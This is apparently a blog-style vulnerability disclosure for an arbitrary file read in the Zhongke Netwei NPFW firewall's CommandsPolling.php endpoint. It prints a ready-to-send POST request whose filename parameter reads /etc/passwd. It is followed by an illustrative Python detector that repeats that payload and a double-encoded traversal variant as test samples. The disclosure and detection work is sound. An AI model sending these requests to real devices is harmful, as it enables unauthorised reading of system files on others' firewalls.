Zhongke Netwei NPFW Firewall CommandsPolling.php Arbitrary file reading vulnerability
Vulnerability Description
The Zhongke Netwei NPFW firewall has an arbitrary file reading vulnerability. Because the code does not filter input sufficiently, any file on the server can be read.
Vulnerability Impact
Zhongke Netwei NPFW Firewall
Network surveying and mapping
Vulnerability reproduction
Login page
Send a request packet
POST /direct/polling/CommandsPolling.php HTTP/1.1
Host:
Cookie: PHPSESSID=014d2705856e1df139772db42ccbaf9f
Content-Length: 47
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="92", " Not A;Brand";v="99", "Google Chrome";v="92"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

command=ping&filename=%2Fetc%2Fpasswd&cmdParam=
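
A detection check for the request shown above, added here as an example and not taken from the original post or the vendor: it flags requests to CommandsPolling.php whose filename parameter decodes to an absolute path or contains parent-directory traversal. The function names, the host fw.example, the value ping_output.txt and the assumption that legitimate filename values are plain relative names are made up for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

ENDPOINT = "/direct/polling/CommandsPolling.php"  # path from the request above

def normalise(value, rounds=3):
    """Decode repeatedly so double-encoded values (%252F) are caught too."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")

def inspect_request(raw):
    """Return a finding dict for a suspicious request, otherwise None."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    parts = head.split("\n", 1)[0].split()
    if len(parts) < 2:
        return None
    path, _, query = parts[1].partition("?")
    if normalise(path).lower() != ENDPOINT.lower():
        return None
    # filename may arrive in the form body or in the query string
    values = parse_qs(body.strip(), keep_blank_values=True).get("filename", [])
    values += parse_qs(query, keep_blank_values=True).get("filename", [])
    for value in values:
        name = normalise(value)
        reasons = []
        if name.startswith("/") or re.match(r"[A-Za-z]:/", name):
            reasons.append("absolute path")
        if ".." in name.split("/"):
            reasons.append("parent-directory traversal")
        if reasons:
            return {"method": parts[0], "filename": name, "reasons": reasons}
    return None

# Constructed sample requests; the host name and the benign value are made up.
HDR = "Host: fw.example\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\n"
POST = "POST /direct/polling/CommandsPolling.php HTTP/1.1\r\n" + HDR
SAMPLES = [
    POST + "command=ping&filename=%2Fetc%2Fpasswd&cmdParam=",
    POST + "command=ping&filename=..%252F..%252Fetc%252Fpasswd&cmdParam=",
    POST + "command=ping&filename=ping_output.txt&cmdParam=",
    "GET /index.php?filename=%2Fetc%2Fpasswd HTTP/1.1\r\nHost: fw.example\r\n\r\n",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(inspect_request(sample))
```

The same two checks, applied server-side to the decoded parameter before any file is opened, are what the missing filtering would need to enforce.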
This post is licensed under CC BY 4.0 by the author.